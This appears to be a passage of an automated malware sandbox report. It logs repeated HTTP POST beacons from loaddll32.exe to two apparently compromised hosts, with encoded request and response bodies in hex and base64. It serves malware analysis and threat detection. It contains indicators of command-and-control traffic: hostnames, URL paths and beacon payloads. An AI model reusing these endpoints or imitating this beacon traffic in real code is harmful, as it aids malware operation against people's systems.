                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzeUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          49192.168.2.749844103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:26.282356024 CEST1730OUTPOST /xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:27.115350962 CEST1739INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:24 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:24 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.749756107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:49.560353041 CEST1029OUTPOST /pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:49.976651907 CEST1102INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:49 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2f 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt/dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          50192.168.2.749847103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:27.839397907 CEST1748OUTPOST /xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:28.680540085 CEST1757INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:25 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:25 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzdEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          51192.168.2.749850103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:29.088943005 CEST1759OUTPOST /xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:29.898808002 CEST1769INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:26 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:26 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzdUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          52192.168.2.749852103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:30.311337948 CEST1777OUTPOST /xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:31.158032894 CEST1786INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:28 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:28 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 79 66 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtyfEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          53192.168.2.749855103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:34.618367910 CEST1822OUTPOST /xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.749762107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:51.025165081 CEST1103OUTPOST /pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:51.413126945 CEST1104INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:51 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.749764107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:51.829639912 CEST1106OUTPOST /pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:52.245923996 CEST1203INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:51 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          8192.168.2.749765107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:52.541340113 CEST1336OUTPOST /pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:52.950078011 CEST1342INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:52 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          9192.168.2.749768107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:53.427154064 CEST1347OUTPOST /pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:53.840007067 CEST1355INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:53 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:20:25:42
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\loaddll32.exe
                                          Wow64 process (32bit):true
